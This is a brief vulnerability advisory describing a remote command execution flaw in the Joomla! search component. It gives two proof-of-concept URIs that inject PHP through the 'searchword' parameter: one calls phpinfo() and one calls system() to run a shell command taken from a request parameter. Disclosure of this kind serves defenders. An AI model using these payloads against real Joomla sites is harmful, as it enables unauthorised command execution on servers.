|
Joomla! Search Component Remote Command Execution Vulnerability
An attacker can exploit this issue via a browser. The following proof-of-concept URIs are available: http://www.example.com/index.php?searchword=";phpinfo();%23&option=com_search&Itemid=1 http://www.example.com/index.php?c=id&searchword=";system($_GET[c]);%23&option=com_search&Itemid=1 |
|
Privacy Statement |